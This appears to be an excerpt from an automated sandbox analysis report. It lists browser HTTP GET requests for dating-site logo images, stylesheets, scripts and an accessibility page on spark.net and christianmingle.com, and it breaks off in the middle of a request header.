Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/a479b71c-1ac9-4e7e-bfbd-ad99febdb960/Christian-Mingle.png?format=750w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/03b0fd77-d50c-4741-84f9-65afe3436291/zoosk.png?format=750w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/137f96f5-56ba-4576-88ab-9b0999060379/EliteSingles_0.png?format=750w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/a479b71c-1ac9-4e7e-bfbd-ad99febdb960/Christian-Mingle.png?format=750w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/census/RecordHit HTTP/1.1Host: www.spark.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: crumb=BbtMe1PElTyHNTBjN2Q5ZTlkYzgwZTZkNDUxZGQ4NzEyNmNmY2I2
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/56d929e6-8419-4133-89bf-d861886af153/SilverSingles_1.png?format=750w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en/legal-en/our-commitment-to-accessibility/ HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/css/swiper.min.css?ver=3.3.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.5.3 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.6 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/css/font-awesome.min.css?ver=4.6.3 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tm-mega-menu/public/assets/css/style.css?ver=1.1.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/css/linearicons.css?ver=6.5.3 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/css/material-design.css?ver=6.5.3 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/css/swiper.min.css?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/css/style.css?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/css/magnific-popup.min.css?ver=1.1.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/style.css?ver=6.5.3 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2-child/style.css?ver=1.0.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/skins/default/style-default.css?ver=1.2.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/cherry-framework/modules/cherry-js-core/assets/js/min/cherry-js-core.min.js?ver=1.1.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/fonts/fontawesome-webfont.woff2?v=4.6.3 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://about.christianmingle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://about.christianmingle.com/wp-content/themes/monstroid2/assets/css/font-awesome.min.css?ver=4.6.3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/ChristianMingle_130x57.png HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /en/legal-en/our-commitment-to-accessibility/ HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/frontend-builder-global-functions.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/js/min/swiper.jquery.min.js?ver=3.3.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 